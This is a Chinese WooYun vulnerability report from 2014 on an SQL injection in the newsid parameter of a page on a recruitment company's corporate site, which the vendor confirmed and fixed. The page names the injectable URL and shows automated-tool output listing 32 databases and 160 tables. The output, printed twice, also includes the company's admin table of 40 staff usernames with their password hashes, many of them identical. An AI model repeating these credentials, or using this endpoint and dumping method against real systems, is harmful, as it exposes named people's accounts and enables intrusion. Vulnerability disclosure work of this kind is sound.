当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057417

漏洞标题:最佳东方sql注射好多库好多表

相关厂商:最佳东方

漏洞作者: 卡卡

提交时间:2014-04-17 15:26

修复时间:2014-06-01 15:26

公开时间:2014-06-01 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-17: 细节已通知厂商并且等待厂商处理中
2014-04-17: 厂商已经确认,细节仅向厂商公开
2014-04-27: 细节向核心白帽子及相关领域专家公开
2014-05-07: 细节向普通白帽子公开
2014-05-17: 细节向实习白帽子公开
2014-06-01: 细节向公众公开

简要描述:

最佳东方还是蛮注重安全的哈~~~

详细说明:

问题站点:

corp.veryeast.cn


漏洞链接: 

http://corp.veryeast.cn/question/getresult.asp?newsid=


对newsid参数为过滤
单引号报错,很明显的一处注射

.png


也懒的手工了,丢工具跑了

.png


数据库:

available databases [3
[*] 9first
[*] bangdating
[*] cp
[*] dfws_edm
[*] dfwsCMS
[*] dvbbs
[*] hotel_collect
[*] hrTool
[*] jdrc
[*] jdrc_20131019
[*] jdrc_table_backup
[*] jobbon
[*] lt
[*] master
[*] meadin
[*] meadinvote
[*] model
[*] msdb
[*] papers
[*] ReportServer
[*] ReportServerTempDB
[*] sendmail
[*] tempdb
[*] ve_crm
[*] vebbs
[*] veryeast
[*] veryeastcms
[*] wiki
[*] xlms
[*] xz_ihma_crm
[*] xzbbs
[*] XZHome


32个库~~
当前库:veryeastcms
表:

Database: veryeastcms
[160 tables]
+--------------------------+
| FS_AD_Class              |
| FS_AD_Info               |
| FS_AD_Source             |
| FS_AD_TxtInfo            |
| FS_AP_City               |
| FS_AP_Consume            |
| FS_AP_Job                |
| FS_AP_Job_Public         |
| FS_AP_Payment            |
| FS_AP_Province           |
| FS_AP_Resume_BaseInfo    |
| FS_AP_Resume_Certificate |
| FS_AP_Resume_EducateExp  |
| FS_AP_Resume_Intention   |
| FS_AP_Resume_Language    |
| FS_AP_Resume_Mail        |
| FS_AP_Resume_Other       |
| FS_AP_Resume_Position    |
| FS_AP_Resume_ProjectExp  |
| FS_AP_Resume_TrainExp    |
| FS_AP_Resume_WorkCity    |
| FS_AP_Resume_WorkExp     |
| FS_AP_SysPara            |
| FS_AP_Trade              |
| FS_AP_UserList           |
| FS_DS_Address            |
| FS_DS_Class              |
| FS_DS_List               |
| FS_DS_Special            |
| FS_DS_Style              |
| FS_DS_SysPara            |
| FS_FL_Class              |
| FS_FL_FrendList          |
| FS_FL_SysPara            |
| FS_HS_Picture            |
| FS_HS_Quotation          |
| FS_HS_Second             |
| FS_HS_SysPara            |
| FS_HS_Tenancy            |
| FS_HS_UserList           |
| FS_ME_Answer             |
| FS_ME_AnswerForPoint     |
| FS_ME_Answer_User        |
| FS_ME_Award              |
| FS_ME_Book               |
| FS_ME_BuyBag             |
| FS_ME_Card               |
| FS_ME_CardPut            |
| FS_ME_CertFile           |
| FS_ME_CorpCard           |
| FS_ME_CorpUser           |
| FS_ME_Favorite           |
| FS_ME_FavoriteClass      |
| FS_ME_Friends            |
| FS_ME_GetThing           |
| FS_ME_Group              |
| FS_ME_GroupDebate        |
| FS_ME_GroupDebateClass   |
| FS_ME_GroupDebateManage  |
| FS_ME_Help               |
| FS_ME_InfoClass          |
| FS_ME_InfoContribution   |
| FS_ME_InfoDown           |
| FS_ME_InfoProduct        |
| FS_ME_InfoiLogParam      |
| FS_ME_InfoiLogTemplet    |
| FS_ME_Infoilog           |
| FS_ME_Log                |
| FS_ME_Message            |
| FS_ME_MyInfo             |
| FS_ME_MySysPara          |
| FS_ME_News               |
| FS_ME_Order              |
| FS_ME_Order_Detail       |
| FS_ME_POP                |
| FS_ME_Pay                |
| FS_ME_Photo              |
| FS_ME_PhotoClass         |
| FS_ME_Prize              |
| FS_ME_Report             |
| FS_ME_Review             |
| FS_ME_SysPara            |
| FS_ME_User_Prize         |
| FS_ME_Users              |
| FS_ME_VocationClass      |
| FS_ME_businesscard       |
| FS_ME_businesscardClass  |
| FS_ME_iLogClass          |
| FS_ME_iLogSysParam       |
| FS_MF_Admin              |
| FS_MF_AdminGroup         |
| FS_MF_Config             |
| FS_MF_DefineData         |
| FS_MF_DefineTable        |
| FS_MF_DefineTableClass   |
| FS_MF_Error_Log          |
| FS_MF_FreeLabel          |
| FS_MF_Labestyle          |
| FS_MF_Lable              |
| FS_MF_LableClass         |
| FS_MF_Login_Log          |
| FS_MF_Mod                |
| FS_MF_Mod_Para           |
| FS_MF_Oper_Log           |
| FS_MF_POP                |
| FS_MF_StyleClass         |
| FS_MF_Sub_Sys            |
| FS_MS_Company            |
| FS_MS_ExpressCompany     |
| FS_MS_PayMethod          |
| FS_MS_Products           |
| FS_MS_ProductsClass      |
| FS_MS_Special            |
| FS_MS_SysPara            |
| FS_MS_WithDraw           |
| FS_MS_WithDraw_Detail    |
| FS_NS_FreeJsFile         |
| FS_NS_Freejs             |
| FS_NS_General            |
| FS_NS_News               |
| FS_NS_NewsClass          |
| FS_NS_News_Unrgl         |
| FS_NS_SpeciaList         |
| FS_NS_Special            |
| FS_NS_SysParam           |
| FS_NS_Sysjs              |
| FS_NS_TodayPic           |
| FS_SD_Address            |
| FS_SD_Class              |
| FS_SD_Config             |
| FS_SD_News               |
| FS_SS_Stat               |
| FS_SS_SysPara            |
| FS_VE_QuestionResult     |
| FS_VS_Class              |
| FS_VS_Items              |
| FS_VS_Items_Result       |
| FS_VS_Steps              |
| FS_VS_SysPara            |
| FS_VS_Theme              |
| FS_WS_BBS                |
| FS_WS_Class              |
| FS_WS_Config             |
| FS_WS_NewsTell           |
| VE_Survey_Class          |
| VE_Survey_Item           |
| VE_Survey_Result         |
| VE_Survey_Topic          |
| VE_Survey_User           |
| VE_sendMail              |
| xlaALSBusy               |
| xlaALSCans               |
| xlaALSCustomers          |
| xlaALSDepts              |
| xlaALSRequests           |
| xlaALSUsers              |
| xlaALSVisitors           |
| xlaALSiDeptsCans         |
| xlaALSiUsersCans         |
| xlaALSiUsersDepts        |
+--------------------------+


这么多表,不难看出数据量有多大
管理账号:

Database: veryeastcms
Table: FS_MF_Admin
[40 entries]
+---------------+------------------+
| Admin_Name    | Admin_Pass_Word  |
+---------------+------------------+
| admin         | ee8361d8773b19d0 |
| caibian       | 961f721aba704dd7 |
| chengting     | 49ba59abbe56e057 |
| chenjie       | 2aa5efe8a2467438 |
| chenlingxiao  | 0e72c85d36be5edc |
| chenxuejuan   | 28edea3803d9aeab |
| daiyeqin      | 44c258f9e94f9a1b |
| fengzenghua   | 49ba59abbe56e057 |
| fuhuayan      | 49ba59abbe56e057 |
| huangxian     | 49ba59abbe56e057 |
| hudan         | 49ba59abbe56e057 |
| huhailin      | 4ac646c9e65a1769 |
| huxiaoling    | 49ba59abbe56e057 |
| jinweiwei     | 49ba59abbe56e057 |
| jiqinghuan    | 4305282bdebcb792 |
| liling        | 49ba59abbe56e057 |
| lishanshan    | 11002a996f767f06 |
| liuxiuliang   | 49ba59abbe56e057 |
| lixiangqin    | f4671fe259c2c911 |
| liyang        | 7c722d6ac7b3c8be |
| qiulanglang   | 49ba59abbe56e057 |
| ruanshufang   | 7b8dc4ec98d843c1 |
| shichangzhuli | 49ba59abbe56e057 |
| shishanshan   | 49ba59abbe56e057 |
| sunhuaying    | a3481141fc7f4454 |
| sunshaochen   | 7db75a7ec1ab2755 |
| tongqingling  | 49ba59abbe56e057 |
| wangxiaoyan   | 7f7a01899b18e4fb |
| wupengfei     | 49ba59abbe56e057 |
| wuyunyun      | ae1450e4fa7252b0 |
| xiefang       | 039a376d7ce793ee |
| xiefei        | 49ba59abbe56e057 |
| yaozhuo       | 49ba59abbe56e057 |
| zhanglin      | 49ba59abbe56e057 |
| zhangming     | 3c4040fafda4523d |
| zhangrui      | 49ba59abbe56e057 |
| zhaoziying    | 49ba59abbe56e057 |
| zhiban        | 49ba59abbe56e057 |
| zhoulingjia   | 119d5f6c8576bda1 |
| zhouyebo      | 49ba59abbe56e057 |
+---------------+------------------+


只是检测,所以到此为止,也没有深入下去了~~

漏洞证明:


.png


.png


数据库:

available databases [3
[*] 9first
[*] bangdating
[*] cp
[*] dfws_edm
[*] dfwsCMS
[*] dvbbs
[*] hotel_collect
[*] hrTool
[*] jdrc
[*] jdrc_20131019
[*] jdrc_table_backup
[*] jobbon
[*] lt
[*] master
[*] meadin
[*] meadinvote
[*] model
[*] msdb
[*] papers
[*] ReportServer
[*] ReportServerTempDB
[*] sendmail
[*] tempdb
[*] ve_crm
[*] vebbs
[*] veryeast
[*] veryeastcms
[*] wiki
[*] xlms
[*] xz_ihma_crm
[*] xzbbs
[*] XZHome


32个库~~
当前库:veryeastcms
表:

Database: veryeastcms
[160 tables]
+--------------------------+
| FS_AD_Class              |
| FS_AD_Info               |
| FS_AD_Source             |
| FS_AD_TxtInfo            |
| FS_AP_City               |
| FS_AP_Consume            |
| FS_AP_Job                |
| FS_AP_Job_Public         |
| FS_AP_Payment            |
| FS_AP_Province           |
| FS_AP_Resume_BaseInfo    |
| FS_AP_Resume_Certificate |
| FS_AP_Resume_EducateExp  |
| FS_AP_Resume_Intention   |
| FS_AP_Resume_Language    |
| FS_AP_Resume_Mail        |
| FS_AP_Resume_Other       |
| FS_AP_Resume_Position    |
| FS_AP_Resume_ProjectExp  |
| FS_AP_Resume_TrainExp    |
| FS_AP_Resume_WorkCity    |
| FS_AP_Resume_WorkExp     |
| FS_AP_SysPara            |
| FS_AP_Trade              |
| FS_AP_UserList           |
| FS_DS_Address            |
| FS_DS_Class              |
| FS_DS_List               |
| FS_DS_Special            |
| FS_DS_Style              |
| FS_DS_SysPara            |
| FS_FL_Class              |
| FS_FL_FrendList          |
| FS_FL_SysPara            |
| FS_HS_Picture            |
| FS_HS_Quotation          |
| FS_HS_Second             |
| FS_HS_SysPara            |
| FS_HS_Tenancy            |
| FS_HS_UserList           |
| FS_ME_Answer             |
| FS_ME_AnswerForPoint     |
| FS_ME_Answer_User        |
| FS_ME_Award              |
| FS_ME_Book               |
| FS_ME_BuyBag             |
| FS_ME_Card               |
| FS_ME_CardPut            |
| FS_ME_CertFile           |
| FS_ME_CorpCard           |
| FS_ME_CorpUser           |
| FS_ME_Favorite           |
| FS_ME_FavoriteClass      |
| FS_ME_Friends            |
| FS_ME_GetThing           |
| FS_ME_Group              |
| FS_ME_GroupDebate        |
| FS_ME_GroupDebateClass   |
| FS_ME_GroupDebateManage  |
| FS_ME_Help               |
| FS_ME_InfoClass          |
| FS_ME_InfoContribution   |
| FS_ME_InfoDown           |
| FS_ME_InfoProduct        |
| FS_ME_InfoiLogParam      |
| FS_ME_InfoiLogTemplet    |
| FS_ME_Infoilog           |
| FS_ME_Log                |
| FS_ME_Message            |
| FS_ME_MyInfo             |
| FS_ME_MySysPara          |
| FS_ME_News               |
| FS_ME_Order              |
| FS_ME_Order_Detail       |
| FS_ME_POP                |
| FS_ME_Pay                |
| FS_ME_Photo              |
| FS_ME_PhotoClass         |
| FS_ME_Prize              |
| FS_ME_Report             |
| FS_ME_Review             |
| FS_ME_SysPara            |
| FS_ME_User_Prize         |
| FS_ME_Users              |
| FS_ME_VocationClass      |
| FS_ME_businesscard       |
| FS_ME_businesscardClass  |
| FS_ME_iLogClass          |
| FS_ME_iLogSysParam       |
| FS_MF_Admin              |
| FS_MF_AdminGroup         |
| FS_MF_Config             |
| FS_MF_DefineData         |
| FS_MF_DefineTable        |
| FS_MF_DefineTableClass   |
| FS_MF_Error_Log          |
| FS_MF_FreeLabel          |
| FS_MF_Labestyle          |
| FS_MF_Lable              |
| FS_MF_LableClass         |
| FS_MF_Login_Log          |
| FS_MF_Mod                |
| FS_MF_Mod_Para           |
| FS_MF_Oper_Log           |
| FS_MF_POP                |
| FS_MF_StyleClass         |
| FS_MF_Sub_Sys            |
| FS_MS_Company            |
| FS_MS_ExpressCompany     |
| FS_MS_PayMethod          |
| FS_MS_Products           |
| FS_MS_ProductsClass      |
| FS_MS_Special            |
| FS_MS_SysPara            |
| FS_MS_WithDraw           |
| FS_MS_WithDraw_Detail    |
| FS_NS_FreeJsFile         |
| FS_NS_Freejs             |
| FS_NS_General            |
| FS_NS_News               |
| FS_NS_NewsClass          |
| FS_NS_News_Unrgl         |
| FS_NS_SpeciaList         |
| FS_NS_Special            |
| FS_NS_SysParam           |
| FS_NS_Sysjs              |
| FS_NS_TodayPic           |
| FS_SD_Address            |
| FS_SD_Class              |
| FS_SD_Config             |
| FS_SD_News               |
| FS_SS_Stat               |
| FS_SS_SysPara            |
| FS_VE_QuestionResult     |
| FS_VS_Class              |
| FS_VS_Items              |
| FS_VS_Items_Result       |
| FS_VS_Steps              |
| FS_VS_SysPara            |
| FS_VS_Theme              |
| FS_WS_BBS                |
| FS_WS_Class              |
| FS_WS_Config             |
| FS_WS_NewsTell           |
| VE_Survey_Class          |
| VE_Survey_Item           |
| VE_Survey_Result         |
| VE_Survey_Topic          |
| VE_Survey_User           |
| VE_sendMail              |
| xlaALSBusy               |
| xlaALSCans               |
| xlaALSCustomers          |
| xlaALSDepts              |
| xlaALSRequests           |
| xlaALSUsers              |
| xlaALSVisitors           |
| xlaALSiDeptsCans         |
| xlaALSiUsersCans         |
| xlaALSiUsersDepts        |
+--------------------------+


这么多表,不难看出数据量有多大
管理账号:

Database: veryeastcms
Table: FS_MF_Admin
[40 entries]
+---------------+------------------+
| Admin_Name    | Admin_Pass_Word  |
+---------------+------------------+
| admin         | ee8361d8773b19d0 |
| caibian       | 961f721aba704dd7 |
| chengting     | 49ba59abbe56e057 |
| chenjie       | 2aa5efe8a2467438 |
| chenlingxiao  | 0e72c85d36be5edc |
| chenxuejuan   | 28edea3803d9aeab |
| daiyeqin      | 44c258f9e94f9a1b |
| fengzenghua   | 49ba59abbe56e057 |
| fuhuayan      | 49ba59abbe56e057 |
| huangxian     | 49ba59abbe56e057 |
| hudan         | 49ba59abbe56e057 |
| huhailin      | 4ac646c9e65a1769 |
| huxiaoling    | 49ba59abbe56e057 |
| jinweiwei     | 49ba59abbe56e057 |
| jiqinghuan    | 4305282bdebcb792 |
| liling        | 49ba59abbe56e057 |
| lishanshan    | 11002a996f767f06 |
| liuxiuliang   | 49ba59abbe56e057 |
| lixiangqin    | f4671fe259c2c911 |
| liyang        | 7c722d6ac7b3c8be |
| qiulanglang   | 49ba59abbe56e057 |
| ruanshufang   | 7b8dc4ec98d843c1 |
| shichangzhuli | 49ba59abbe56e057 |
| shishanshan   | 49ba59abbe56e057 |
| sunhuaying    | a3481141fc7f4454 |
| sunshaochen   | 7db75a7ec1ab2755 |
| tongqingling  | 49ba59abbe56e057 |
| wangxiaoyan   | 7f7a01899b18e4fb |
| wupengfei     | 49ba59abbe56e057 |
| wuyunyun      | ae1450e4fa7252b0 |
| xiefang       | 039a376d7ce793ee |
| xiefei        | 49ba59abbe56e057 |
| yaozhuo       | 49ba59abbe56e057 |
| zhanglin      | 49ba59abbe56e057 |
| zhangming     | 3c4040fafda4523d |
| zhangrui      | 49ba59abbe56e057 |
| zhaoziying    | 49ba59abbe56e057 |
| zhiban        | 49ba59abbe56e057 |
| zhoulingjia   | 119d5f6c8576bda1 |
| zhouyebo      | 49ba59abbe56e057 |
+---------------+------------------+

修复方案:

过滤~

版权声明:转载请注明来源 卡卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-17 15:30

厂商回复:

确认漏洞,感谢@卡卡

最新状态:

2014-04-17:漏洞已修复